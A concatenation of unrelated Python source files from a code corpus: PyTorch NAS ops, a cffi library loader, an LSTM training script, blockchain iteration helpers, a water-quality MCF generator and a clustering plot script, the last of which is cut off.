]
})
def test_no_replacement(self):
"""set_block should not perform replacement if there are no recents"""
self.reset()
original_cache = copy.deepcopy(self.cache)
self.cache.recently_used_addrs = []
self.cache.set_block(
replacement_policy='lru',
num_blocks_per_set=4,
addr_index='010',
new_entry=self.new_entry)
nose.assert_is_not(self.cache, original_cache)
nose.assert_equal(self.cache, original_cache)
|
the-stack_106_23320 | import torch
import torch.nn as nn
# OPS is a set of layers with same input/output channel.
OPS = {
'none': lambda C, stride, affine: Zero(stride),
'avg_pool_3x3': lambda C, stride, affine: nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False),
'max_pool_3x3': lambda C, stride, affine: nn.MaxPool2d(3, stride=stride, padding=1),
'skip_connect': lambda C, stride, affine: Identity() if stride == 1 else FactorizedReduce(C, C, affine=affine),
'sep_conv_3x3': lambda C, stride, affine: SepConv(C, C, 3, stride, 1, affine=affine),
'sep_conv_5x5': lambda C, stride, affine: SepConv(C, C, 5, stride, 2, affine=affine),
'sep_conv_7x7': lambda C, stride, affine: SepConv(C, C, 7, stride, 3, affine=affine),
'dil_conv_3x3': lambda C, stride, affine: DilConv(C, C, 3, stride, 2, 2, affine=affine),
'dil_conv_5x5': lambda C, stride, affine: DilConv(C, C, 5, stride, 4, 2, affine=affine),
'conv_7x1_1x7': lambda C, stride, affine: nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C, C, (1, 7), stride=(1, stride), padding=(0, 3), bias=False),
nn.Conv2d(C, C, (7, 1), stride=(stride, 1), padding=(3, 0), bias=False),
nn.BatchNorm2d(C, affine=affine)
),
}
class ReLUConvBN(nn.Module):
"""
Stack of relu-conv-bn
"""
def __init__(self, C_in, C_out, kernel_size, stride, padding, affine=True):
"""
:param C_in:
:param C_out:
:param kernel_size:
:param stride:
:param padding:
:param affine:
"""
super(ReLUConvBN, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_out, kernel_size, stride=stride, padding=padding, bias=False),
nn.BatchNorm2d(C_out, affine=affine)
)
def forward(self, x):
return self.op(x)
class DilConv(nn.Module):
"""
relu-dilated conv-bn
"""
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation, affine=True):
"""
:param C_in:
:param C_out:
:param kernel_size:
:param stride:
:param padding: 2/4
:param dilation: 2
:param affine:
"""
super(DilConv, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride, padding=padding,
dilation=dilation,
groups=C_in, bias=False),
nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_out, affine=affine),
)
def forward(self, x):
return self.op(x)
class SepConv(nn.Module):
"""
implemented separate convolution via pytorch groups parameters
"""
def __init__(self, C_in, C_out, kernel_size, stride, padding, affine=True):
"""
:param C_in:
:param C_out:
:param kernel_size:
:param stride:
:param padding: 1/2
:param affine:
"""
super(SepConv, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride, padding=padding,
groups=C_in, bias=False),
nn.Conv2d(C_in, C_in, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_in, affine=affine),
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=1, padding=padding,
groups=C_in, bias=False),
nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_out, affine=affine),
)
def forward(self, x):
return self.op(x)
class Identity(nn.Module):
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x
class Zero(nn.Module):
"""
zero by stride
"""
def __init__(self, stride):
super(Zero, self).__init__()
self.stride = stride
def forward(self, x):
if self.stride == 1:
return x.mul(0.)
return x[:, :, ::self.stride, ::self.stride].mul(0.)
class FactorizedReduce(nn.Module):
"""
reduce feature maps height/width by half while keeping channel same
"""
def __init__(self, C_in, C_out, affine=True):
"""
:param C_in:
:param C_out:
:param affine:
"""
super(FactorizedReduce, self).__init__()
assert C_out % 2 == 0
self.relu = nn.ReLU(inplace=False)
# this conv layer operates on even pixels to produce half width, half channels
self.conv_1 = nn.Conv2d(C_in, C_out // 2, 1, stride=2, padding=0, bias=False)
# this conv layer operates on odd pixels (because of code in forward()) to produce half width, half channels
self.conv_2 = nn.Conv2d(C_in, C_out // 2, 1, stride=2, padding=0, bias=False)
self.bn = nn.BatchNorm2d(C_out, affine=affine)
def forward(self, x):
x = self.relu(x)
# x: torch.Size([32, 32, 32, 32])
# conv1: [b, c_out//2, d//2, d//2]
# conv2: []
# out: torch.Size([32, 32, 16, 16])
# concate two half channels to produce same number of channels as before but with output as only half the width
out = torch.cat([self.conv_1(x), self.conv_2(x[:, :, 1:, 1:])], dim=1)
out = self.bn(out)
return out
|
the-stack_106_23322 | """
cluster_toolkit is a module for computing galaxy cluster models.
"""
import cffi
import glob
import os
import numpy as np
__author__ = "Tom McClintock <[email protected]>"
cluster_toolkit_dir = os.path.dirname(__file__)
include_dir = os.path.join(cluster_toolkit_dir,'include')
lib_file = os.path.join(cluster_toolkit_dir,'_cluster_toolkit.so')
# Some installation (e.g. Travis with python 3.x)
# name this e.g. _cluster_toolkit.cpython-34m.so,
# so if the normal name doesn't exist, look for something else.
# Note: we ignore this if we are building the docs on RTD
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not os.path.exists(lib_file) and not on_rtd:
alt_files = glob.glob(os.path.join(os.path.dirname(__file__),'_cluster_toolkit*.so'))
if len(alt_files) == 0:
raise IOError("No file '_cluster_toolkit.so' found in %s"%cluster_toolkit_dir)
if len(alt_files) > 1:
raise IOError("Multiple files '_cluster_toolkit*.so' found in %s: %s"%(cluster_toolkit_dir,alt_files))
lib_file = alt_files[0]
_ffi = cffi.FFI()
for file_name in glob.glob(os.path.join(include_dir, '*.h')):
_ffi.cdef(open(file_name).read())
_ffi.cdef('const char * gsl_strerror(const int gsl_errno);')
_lib = _ffi.dlopen(lib_file)
_lib.gsl_set_error_handler_off()
def _handle_gsl_error(err, fn):
if err != 0:
msg = _ffi.string(_lib.gsl_strerror(err))
raise Exception('GSL error in function {}: {}'.format(fn.__name__, msg))
class _ArrayWrapper:
def __init__(self, obj, name=None, allow_multidim=False):
self.arr = np.require(obj, dtype=np.float64,
requirements=['C_CONTIGUOUS'])
self.scalar = self.arr.ndim == 0
self.ndim = self.arr.ndim
self.shape = self.arr.shape
if (self.ndim > 1) and not allow_multidim:
if name is not None:
raise ValueError('{} cannot be >1 dim'.format(name))
raise ValueError('array cannot be >1 dim')
def cast(self):
return _ffi.cast('double*', self.arr.ctypes.data)
def finish(self):
if self.scalar:
return self.arr[()]
return self.arr
def __len__(self):
if self.scalar:
return 1
return self.arr.size
@classmethod
def zeros_like(cls, obj):
if isinstance(obj, _ArrayWrapper):
return cls(np.zeros_like(obj.arr))
return cls(np.zeros_like(obj))
@classmethod
def zeros(cls, shape):
return cls(np.zeros(shape, dtype=np.double))
@classmethod
def ones_like(cls, obj):
return cls(np.ones_like(obj))
@classmethod
def ones(cls, shape):
return cls(np.ones(shape, dtype=np.double))
from . import averaging, bias, boostfactors, concentration, deltasigma, density, exclusion, massfunction, miscentering, peak_height, profile_derivatives, sigma_reconstruction, xi
|
the-stack_106_23323 | import re
class Star:
def __init__(self, x, y, dx, dy):
# print(x, y, dx, dy)
self.x = int(x)
self.y = int(y)
self.dx = int(dx)
self.dy = int(dy)
def step(self):
self.x += self.dx
self.y += self.dy
def __repr__(self):
return 'x={} y={}'.format(self.x, self.y)
stars = []
def make_grid(grid_min, s):
min_x = min(stars, key=lambda star: star.x).x
max_x = max(stars, key=lambda star: star.x).x
min_y = min(stars, key=lambda star: star.y).y
max_y = max(stars, key=lambda star: star.y).y
# print(min_x, max_x, min_y, max_y)
if s == 10144:
star_list = [['.' for y in range(max_y + 1)] for x in range(max_x + 1)]
for star in stars:
star_list[star.x][star.y] = '#'
for row in range(len(star_list) - 1, 0, -1):
print(star_list[row][100:])
print(min_x, max_x, min_y, max_y)
temp_min = abs(min_x - max_x) * abs(min_y - max_y)
# print(temp_min)
if temp_min < grid_min[0]:
grid_min[0] = temp_min
grid_min[1] = s
return grid_min
with open('input.txt', 'r') as f:
data = f.read().splitlines()
for line in data:
stars.append(
Star(*re.match('position=<\s*(-?\d*),\s*(-?\d*)>\s*velocity=<\s*(-?\d*),\s*(-?\d*)>', line).groups()))
grid_min = [10000000000, 0]
for s in range(10200):
grid_min = make_grid(grid_min, s)
for star in stars:
star.step()
print(grid_min)
|
the-stack_106_23324 | import numpy as np
import tensorflow as tf
from tensorflow.contrib import rnn
import random
import collections
import time
from tensorflow.python.ops import array_ops
from tensorflow.contrib.rnn.python.ops import rnn_cell
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import init_ops
from tensorflow.contrib.rnn import GRUCell
from org.mk.training.dl.common import input_one_hot
from org.mk.training.dl.util import get_rel_save_file
import sys
# data I/O
train_file=sys.argv[1]
data = open(train_file, 'r').read()
# Parameters
learning_rate = 0.001
#training_iters = 50000
training_iters = 200
display_step = 100
n_input = 3
# number of units in RNN cell
n_hidden = 5
rnd=np.random.RandomState(42)
def read_data(fname):
with open(fname) as f:
data = f.readlines()
data = [x.strip() for x in data]
data = [data[i].lower().split() for i in range(len(data))]
data = np.array(data)
data = np.reshape(data, [-1, ])
return data
train_data = read_data(train_file)
def build_dataset(words):
count = collections.Counter(words).most_common()
dictionary = dict()
sortedwords=sorted(set(words))
for i,word in enumerate(sortedwords):
dictionary[word] = i
reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))
return dictionary, reverse_dictionary
dictionary, reverse_dictionary = build_dataset(train_data)
vocab_size = len(dictionary)
# Place holder for Mini batch input output
x = tf.placeholder("float", [None, n_input, vocab_size])
y = tf.placeholder("float", [None, vocab_size])
# RNN output node weights and biases
weights = {
'out': tf.Variable([[-0.09588283, -2.2044923 , -0.74828255, 0.14180686, -0.32083616,
-0.9444244 , 0.06826905, -0.9728962 , -0.18506959, 1.0618515 ],
[ 1.156649 , 3.2738173 , -1.2556943 , -0.9079511 , -0.82127047,
-1.1448543 , -0.60807484, -0.5885713 , 1.0378786 , -0.7088431 ],
[ 1.006477 , 0.28033388, -0.1804534 , 0.8093307 , -0.36991575,
0.29115433, -0.01028167, -0.7357091 , 0.92254084, -0.10753923],
[ 0.19266959, 0.6108299 , 2.2495654 , 1.5288974 , 1.0172302 ,
1.1311738 , 0.2666629 , -0.30611828, -0.01412263, 0.44799015],
[ 0.19266959, 0.6108299 , 2.2495654 , 1.5288974 , 1.0172302 ,
1.1311738 , 0.2666629 , -0.30611828, -0.01412263, 0.44799015]]
)
}
biases = {
'out': tf.Variable([ 0.1458478 , -0.3660951 , -2.1647317 , -1.9633691 , -0.24532059,
0.14005205, -1.0961286 , -0.43737876, 0.7028531 , -1.8481724 ]
)
}
#works with 2 dimension hence easy but not optimal
"""
def RNN(x, weights, biases):
with variable_scope.variable_scope(
"other", initializer=init_ops.constant_initializer(0.1)) as vs:
x = tf.unstack(x, n_input, 1)
cell = rnn_cell.LayerNormBasicLSTMCell(n_hidden, layer_norm=False)
outputs, states = rnn.static_rnn(cell, x, dtype=tf.float32)
return tf.matmul(outputs[-1], weights['out']) + biases['out'],outputs,states,weights['out'],biases['out']
"""
#Same as above
#works with 3 dimensions. Line 112 takes care of extracting last (h*wy=by) in 2 dimensions
def RNN(x, weights, biases):
with variable_scope.variable_scope(
"other", initializer=init_ops.constant_initializer(0.1)) as vs:
cell = rnn_cell.LayerNormBasicLSTMCell(n_hidden, layer_norm=False)
outputs, states = tf.nn.dynamic_rnn(cell, x, dtype=tf.float32)
return tf.expand_dims(tf.matmul(outputs[-1] , weights['out'])[-1],0) + biases['out'],outputs[-1],states,weights['out'],biases['out']
pred,output,state,weights_out,biases_out = RNN(x, weights, biases)
# Loss and optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
grads_and_vars_tf_style = optimizer.compute_gradients(cost)
train_tf_style = optimizer.apply_gradients(grads_and_vars_tf_style)
# Model evaluation
correct_pred = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
global_step = tf.Variable(0, name='global_step', trainable=False)
# Initializing the variables
init = tf.global_variables_initializer()
projectdir="rnn_words"
start_time = time.time()
def elapsed(sec):
if sec<60:
return str(sec) + " sec"
elif sec<(60*60):
return str(sec/60) + " min"
else:
return str(sec/(60*60)) + " hr"
# Launch the graph
saver = tf.train.Saver(max_to_keep=200)
with tf.Session() as session:
session.run(init)
step = 0
offset =2
end_offset = n_input + 1
acc_total = 0
loss_total = 0
print ("offset:",offset)
summary_writer = tf.summary.FileWriter(get_rel_save_file(projectdir),graph=session.graph)
while step < training_iters:
if offset > (len(train_data)-end_offset):
offset = rnd.randint(0, n_input+1)
print("offset:", offset)
symbols_in_keys = [ input_one_hot(dictionary[ str(train_data[i])],vocab_size) for i in range(offset, offset+n_input) ]
symbols_in_keys = np.reshape(np.array(symbols_in_keys), [-1, n_input,vocab_size])
symbols_out_onehot=input_one_hot(dictionary[str(train_data[offset+n_input])],vocab_size)
symbols_out_onehot = np.reshape(symbols_out_onehot,[1,-1])
tfgrads_and_vars_tf_style, _,acc, loss, onehot_pred,tfoutput,tfstate,tfout_weights,tfbiases_out = session.run([grads_and_vars_tf_style,train_tf_style, accuracy, cost, pred,output,state,weights_out,biases_out], \
feed_dict={x: symbols_in_keys, y: symbols_out_onehot})
loss_total += loss
acc_total += acc
print("tfoutput:",tfoutput," tfstate:",tfstate)
print("onehot_pred:",onehot_pred)
print("loss:",loss)
print("tfgrads_and_vars_tf_style:",tfgrads_and_vars_tf_style)
if (step+1) % display_step == 0:
print("Iter= " + str(step+1) + ", Average Loss= " + \
"{:.6f}".format(loss_total/display_step) + ", Average Accuracy= " + \
"{:.2f}%".format(100*acc_total/display_step))
acc_total = 0
loss_total = 0
symbols_in = [train_data[i] for i in range(offset, offset + n_input)]
symbols_out = train_data[offset + n_input]
symbols_out_pred = reverse_dictionary[int(tf.argmax(onehot_pred, 1).eval())]
saver.save(session,
get_rel_save_file(projectdir)+ '%04d' % (step+1), global_step=global_step)
print("%s - Actual word:[%s] vs Predicted word:[%s]" % (symbols_in,symbols_out,symbols_out_pred))
step += 1
offset += (n_input+1)
print("Optimization Finished!")
print("Elapsed time: ", elapsed(time.time() - start_time))
|
the-stack_106_23325 | from typing import Optional, Tuple, Union
from fibo.consensus.pot_iterations import calculate_ip_iters, calculate_iterations_quality, calculate_sp_iters
from fibo.types.blockchain_format.reward_chain_block import RewardChainBlock, RewardChainBlockUnfinished
from fibo.types.blockchain_format.sized_bytes import bytes32
from fibo.util.ints import uint64
def iters_from_block(
constants,
reward_chain_block: Union[RewardChainBlock, RewardChainBlockUnfinished],
sub_slot_iters: uint64,
difficulty: uint64,
) -> Tuple[uint64, uint64]:
if reward_chain_block.challenge_chain_sp_vdf is None:
assert reward_chain_block.signage_point_index == 0
cc_sp: bytes32 = reward_chain_block.pos_ss_cc_challenge_hash
else:
cc_sp = reward_chain_block.challenge_chain_sp_vdf.output.get_hash()
quality_string: Optional[bytes32] = reward_chain_block.proof_of_space.verify_and_get_quality_string(
constants,
reward_chain_block.pos_ss_cc_challenge_hash,
cc_sp,
)
assert quality_string is not None
required_iters: uint64 = calculate_iterations_quality(
constants.DIFFICULTY_CONSTANT_FACTOR,
quality_string,
reward_chain_block.proof_of_space.size,
difficulty,
cc_sp,
)
return (
calculate_sp_iters(constants, sub_slot_iters, reward_chain_block.signage_point_index),
calculate_ip_iters(
constants,
sub_slot_iters,
reward_chain_block.signage_point_index,
required_iters,
),
)
|
the-stack_106_23326 | from typing import Tuple, List
class O_equationset:
"""
the equationset as given by equation (4) defined by different non-negative integers
"""
def __init__(self, l: int, W: int, a_i: List[int], b_i: List[int]):
self.l = l
self.W = W
self.a_i = a_i
self.b_i = b_i
def __contains__(self, item):
"""
check whether the O_equationset contains item
:param item: the item to check
:return: bool
"""
if item < self.l:
return False
for a in self.a_i:
if (item - a) % self.W == 0:
return False
for b in self.b_i:
if item == b:
return False
return True
class Un:
"""
the complete representation of Un required in the BoundedCoverWObstacles sub-routine
"""
def __init__(self, g, complement):
"""
Initialize U_0 by using it's complement, the complement is given as a set of closures
:param g: the graph
:param complement: the complement of U_n, i.e. a list of bounded chains
"""
self.O_i = set() # Where we add the trivial q-residue classes
self.O_i2 = dict() # Where we add the non-trivial q-residue classes in a dict node -> dict(cycle-> O_i)
# for cycle in cycles: # Loop over all cycles
# W = cycle[1] # Get the weight of each cycle
# for node in cycle[0][:-1]: # loop over each (unique) node in the cycle
for node in g.nodes_in_cycles:
W = node.optimal_cycle[1]
if node not in self.O_i2: # initialise the node in the O_i2 dict if not yet done
self.O_i2[node] = dict()
# generate all values nescessary to generate the various values
l = node.minimal_cyclable
a_i = []
other_O_is = dict()
for closure in complement[node]: # go over each bounded chain in the complement
if closure.step == W:
a_i.append(closure.minVal % W)
other_O_is[closure.minVal % W] = max(closure.maxVal + W,
0 if other_O_is.get(closure.minVal % W) is None else
other_O_is[closure.minVal % W])
O_i = O_equationset(l, W, a_i, [])
self.O_i.add((node, O_i))
for closure in other_O_is:
bc = list(a_i)
bc.remove(closure)
O_i = O_equationset(other_O_is[closure], W, bc, [])
self.O_i2[node][closure] = O_i
def add_residue_class(self, O: O_equationset) -> None:
"""
add a O_equationset to the O_s set
:param O: the O_equationset
:return:
"""
self.O_i.add(O)
def __contains__(self, item: Tuple) -> bool:
"""
return True if item is in any if the O_equationsets
:param item: the item (tuple of node, value) for which we check whether we contain it
:return: bool True if contains False otherwhise
"""
for o in self.O_i:
if item[0] != o[0]:
continue
if item[1] in o[1]:
return True
if item[0] not in self.O_i2:
return False
for attempt in self.O_i2[item[0]]:
if item in self.O_i2[item[0]][attempt]:
return True
# if item[1] % attempt[1] in self.O_i2[item[0]][attempt]:
# if item[1] in self.O_i2[item[0]][attempt][item[1] % attempt[1]]:
# return True
return False
def list_O_i(self) -> list:
"""
:return: a list of all O_is in our U_n object
"""
return_val = list(self.O_i)
for node in self.O_i2:
for a_i in self.O_i2[node]:
return_val.append((node, self.O_i2[node][a_i]))
return return_val
def edit_non_triv_q_residueclass(self, node, W, allowed_a_i, new_minval, all_chains):
"""
edit a non-trivial residue class (possibly allowing more values to be seen)
:param node: the node for which the residue class needs to be edited
:param W: the weight of the class
:param allowed_a_i: the allowed a_i from the non-triv q-res classes for this specific chain
:param new_minval: the new minimal value allowed
:param all_chains: a list of all (currently) bounded chains
:return:the newly edited q-residue class in form of an O_equationset
"""
if node.optimal_cycle[1] == W:
if allowed_a_i in self.O_i2[node]:
new_minval2 = min(new_minval, self.O_i2[node][allowed_a_i].l)
new_bi = []
for chain in all_chains:
if chain.step == W and chain.minVal >= new_minval2:
new_bi += chain.get_index_list(0, chain.len())
new_oi = O_equationset(new_minval2, W, self.O_i2[node][allowed_a_i].a_i, new_bi)
self.O_i2[node][allowed_a_i] = new_oi
return new_oi
|
the-stack_106_23330 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pandas as pd
import json
import re
from india.geo.districts import IndiaDistrictsMapper
class WaterQualityBase():
"""
Base class to import and preprocess data files, generate
mcf and tmcf files for Ground Water and Surface Water quality
datasets.
Args:
dataset_name (str): name of the dataset import
util_names (str): name of the corresponding data csv and json file
template_strings (dict): dictionary with mcf/tmcf node templates
Attributes:
dataset_name, util_names, module_dir, template_strings
"""
def __init__(self, dataset_name, util_names, template_strings):
self.dataset_name = dataset_name
self.util_names = util_names
self.module_dir = os.path.dirname(__file__)
self.solute_mcf = template_strings['solute_mcf']
assert self.solute_mcf != ""
self.solute_tmcf = template_strings['solute_tmcf']
assert self.solute_tmcf != ""
self.chemprop_mcf = template_strings['chemprop_mcf']
assert self.chemprop_mcf != ""
self.chemprop_tmcf = template_strings['chemprop_tmcf']
assert self.chemprop_tmcf != ""
self.site_dcid = template_strings['site_dcid']
assert self.site_dcid != ""
self.unit_node = template_strings['unit_node']
assert self.unit_node != ""
def _drop_all_empty_rows(self, df):
"""
Helper method to drop rows with all empty values.
Some rows in df can have just place names and latlong without any
water quality data. Those rows are dropped here.
"""
# Calculating maximum number of empty values in a row
max_na = self.df.notnull().sum(axis=1).min()
max_na += 2 # to account for empty lat and long columns
return df.dropna(thresh=max_na)
def _map_district_to_lgdcodes(self, mapper, state, district):
try:
return mapper.get_district_name_to_lgd_code_mapping(state, district)
except Exception:
return district
def create_dcids_in_csv(self):
"""
Method to map the district names to LGD District Codes
Mapped codes are used to create dcids for water quality stations
Format of dcid for a station:
'india_wris/<lgd_code_of_district>_<name_of_station>'
Example: 'india_wris/579_Velanganni' for Velanganni station in
Nagercoil, Tamil Nadu, India
"""
self.df = pd.read_csv(
os.path.join(self.module_dir,
'data/{}.csv'.format(self.util_names)))
self.df = self._drop_all_empty_rows(self.df)
# Mapping district names to LGD Codes
mapper = IndiaDistrictsMapper()
df_map = self.df[['StateName',
'DistrictName']].drop_duplicates().dropna()
df_map['DistrictCode'] = df_map.apply(
lambda x: self._map_district_to_lgdcodes(mapper, x['StateName'], x[
'DistrictName']),
axis=1)
# Merging LGD codes with original df and creating dcids
self.df = self.df.merge(df_map.drop('StateName', axis=1),
on='DistrictName',
how='left')
self.df['dcid'] = self.df.apply(lambda x: ''.join([
'india_wris/',
str(x['DistrictCode']), '_', ''.join(
re.split('\W+', x['Station Name']))
]),
axis=1)
# Saving the df with codes and dcids in `csv_save_path`
csv_save_path = os.path.join(self.module_dir,
'{}'.format(self.dataset_name),
"{}.csv".format(self.dataset_name))
self.df.to_csv(csv_save_path, index=None)
def create_mcfs(self):
"""
Method to create MCF and TMCF files for the data
Template strings are found inside preprocess.py files
"""
# Defining paths for files
json_file_path = os.path.join(self.module_dir,
"util/{}.json".format(self.util_names))
tmcf_file = os.path.join(self.module_dir,
'{}'.format(self.dataset_name),
"{}.tmcf".format(self.dataset_name))
mcf_file = os.path.join(self.module_dir, '{}'.format(self.dataset_name),
"{}.mcf".format(self.dataset_name))
## Importing water quality indices from util/
with open(json_file_path, 'r') as j:
properties = json.loads(j.read())
pollutants, chem_props = properties
idx = 2 # StatVarObs start from E2; E0 and E1 are location nodes
## Writing MCF and TMCF files
with open(mcf_file, 'w') as mcf, open(tmcf_file, 'w') as tmcf:
# Writing TMCF Location Nodes
tmcf.write(self.site_dcid.format(dataset_name=self.dataset_name))
# Pollutant nodes are written first
for pollutant in pollutants['Pollutant']:
name = pollutant['name']
statvar = pollutant['statvar']
unit = pollutant['unit']
# Writing MCF Node
mcf.write(self.solute_mcf.format(variable=statvar))
# Writing TMCF Property Node
tmcf.write(
self.solute_tmcf.format(dataset_name=self.dataset_name,
index=idx,
variable=statvar,
name=name))
# If unit is available for a StatVar, unit is written in TMCF
if unit:
tmcf.write(self.unit_node.format(unit=unit))
# else, unit is omitted from the node
else:
tmcf.write('\n')
idx += 1
# Chemical properties are written second
for chem_prop in chem_props['ChemicalProperty']:
name = chem_prop['name']
statvar = chem_prop['statvar']
unit = chem_prop['unit']
dcid = chem_prop['dcid']
mcf.write(
self.chemprop_mcf.format(variable=statvar,
dcid=dcid,
statvar=statvar))
tmcf.write(
self.chemprop_tmcf.format(dataset_name=self.dataset_name,
index=idx,
unit=unit,
variable=statvar,
dcid=dcid,
name=name))
if unit:
tmcf.write(self.unit_node.format(unit=unit))
else:
tmcf.write('\n')
idx += 1
|
the-stack_106_23333 | from __future__ import absolute_import, division, print_function, unicode_literals
import socket
import matplotlib
import numpy as np
import os
import collections
import argparse
machine = socket.gethostname()
if machine == "bsccv03":
matplotlib.use('wxagg')
elif 'login' in machine:
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
try:
# This might fail for older versions of matplotlib (e.g in life cluster)
plt.style.use("ggplot")
except NameError:
pass
def printHelp():
"""
Create command line interface
:returns: str -- Output filename ( if specified )
"""
desc = "Program that prints the number of clusters throughout an adaptive sampling simulation. "\
"It must be run in the root folder. "
parser = argparse.ArgumentParser(description=desc)
parser.add_argument("-f", "--filename", type=str, default="", help="Output filename")
parser.add_argument("-o", "--output", type=str, default="", help="Output folder")
args = parser.parse_args()
return args.filename, args.output
def getClusteringSummaryContent(summaryFile):
"""
Get the contents of clustering summary file
:param summaryFile: Clustering summary file
:type summaryFile: str
:returns: list -- List with the contents of the clustering summary file
"""
if os.path.isfile(summaryFile):
summaryContent = np.genfromtxt(summaryFile)
if summaryContent.ndim > 1:
return summaryContent
elif summaryContent.ndim == 1:
# file has only one line
return np.array([summaryContent])
else:
# file existed but was empty
return []
else:
return []
def getTotalNumberOfClustersPerEpoch(templetizedClusteringSummaryFile, folder):
"""
Get the number of clusters in each epoch
:param templetizedClusteringSummaryFile: Template name of the
clustering summary file
:type templetizedClusteringSummaryFile: str
:param folder: Folder where the simulation data is stored
:type folder: str
:returns: list -- List with the number of cluster in each simulation
epoch
"""
allFolders = os.listdir(folder)
numberOfEpochs = len([epoch for epoch in allFolders if epoch.isdigit() and os.path.isfile(templetizedClusteringSummaryFile % int(epoch))])
totalNumberOfClustersPerEpoch = []
for epoch in range(numberOfEpochs):
clusteringSummary = getClusteringSummaryContent(templetizedClusteringSummaryFile % epoch)
if clusteringSummary != []:
totalNumberOfClustersPerEpoch.append(len(clusteringSummary))
return totalNumberOfClustersPerEpoch
def findDifferentClustersInEpoch(column, summaryFile):
"""
Get the distribution of values of a certain column in the clustering
summary
:param column: Column of interest
:type column: int
:param summaryFile: Clustering summary file
:type summaryFile: str
:returns: dict -- Dictionary with the set of different elements in
column and the number of elements in this epoch
"""
clusteringSummary = getClusteringSummaryContent(summaryFile)
epochDictionary = {}
if clusteringSummary != []:
for line in clusteringSummary:
value = line[column]
if value not in epochDictionary:
epochDictionary[value] = len(np.argwhere(clusteringSummary[:, column] == value))
return epochDictionary
def findDifferentClustersForAllEpochs(column, templetizedClusteringSummaryFile, numberOfEpochs):
"""
Get the distribution of values of a certain column in the clustering
summary for each epoch
:param column: Column of interest
:type column: int
:param templetizedClusteringSummaryFile: Template name of the
clustering summary file
:type templetizedClusteringSummaryFile: str
:param numberOfEpochs: Total number of epochs in the simulation
:type numberOfEpochs: int
:returns: list -- List with dictionaries for all epochs. The dictionary
has the set of different values (according to column) and their
number
"""
clustersPerEpoch = []
for epoch in range(numberOfEpochs):
summaryFile = templetizedClusteringSummaryFile % epoch
epochDictionary = findDifferentClustersInEpoch(column, summaryFile)
clustersPerEpoch.append(epochDictionary)
return clustersPerEpoch
def getAllDifferentValues(clustersPerEpoch):
"""
Get all the different values ocurring during a simulation
:param clustersPerEpoch: List with dictionaries for all epochs. The dictionary
has the set of different values (according to column) and their
number
:type clustersPerEpoch: list
:returns: set -- Set containing all values ocurring during a simulation
"""
allValues = set()
for epochSummary in clustersPerEpoch:
for value in epochSummary:
allValues.update([value])
return allValues
def buildClustersPerValue(clustersPerEpoch, numberOfEpochs):
"""
Get the number of clusters that have each value
:param clustersPerEpoch: List with dictionaries for all epochs. The dictionary
has the set of different values (according to column) and their
number
:type clustersPerEpoch: list
:param numberOfEpochs: Total number of epochs in the simulation
:type numberOfEpochs: int
:returns: dict -- Dictionary with the number of clusters that have each
value
"""
clustersPerValue = collections.defaultdict(list)
allValues = getAllDifferentValues(clustersPerEpoch)
for epochSummary in clustersPerEpoch:
foundValues = set()
for value, numClusters in epochSummary.items():
clustersPerValue[value].append(numClusters)
foundValues.update([value])
for value in allValues - foundValues:
clustersPerValue[value].append(0)
return clustersPerValue
def getNumberOfClustersPerEpochForGivenColumn(column, templetizedClusteringSummaryFile, folder):
"""
Get the number of clusters that have each value at each epoch
:param column: Column of interest
:type column: int
:param templetizedClusteringSummaryFile: Template name of the
clustering summary file
:type templetizedClusteringSummaryFile: str
:param folder: Folder where the simulation data is stored
:type folder: str
:returns: dict -- Dictionary with the number of clusters that have each
value
"""
allFolders = os.listdir(folder)
numberOfEpochs = len([epoch for epoch in allFolders if epoch.isdigit() and os.path.isfile(templetizedClusteringSummaryFile % int(epoch))])
clustersPerEpoch = findDifferentClustersForAllEpochs(column, templetizedClusteringSummaryFile, numberOfEpochs)
return buildClustersPerValue(clustersPerEpoch, numberOfEpochs)
def plotClustersPerValue(clustersPerValue):
"""
Plot the number of clusters that have a certain value
:param clustersPerValue: Dictionary with the number of clusters that have each
value
:type clustersPerValue: dict
"""
values = list(clustersPerValue.keys())
sortedValues = np.sort(values)
for value in sortedValues:
plt.plot(clustersPerValue[value], label=str(value))
def plotContactsHistogram(folder, templetizedClusteringSummaryFile):
"""
Plot the histogram of the number of contacts
:param folder: Folder where the simulation data is stored
:type folder: str
:param templetizedClusteringSummaryFile: Template name of the
clustering summary file
:type templetizedClusteringSummaryFile: str
"""
allFolders = os.listdir(folder)
lastEpoch = len([epoch for epoch in allFolders if epoch.isdigit() and os.path.isfile(templetizedClusteringSummaryFile % int(epoch))]) - 1
lastSummary = templetizedClusteringSummaryFile % lastEpoch
contactsColumn = 3
allContacts = np.loadtxt(lastSummary, usecols=(contactsColumn,), ndmin=1)
plt.hist(allContacts)
def main(filename, outputPath):
"""
Plot a summary of the clustering for a simulation:
1) Number of clusters for each threshold value at each epoch
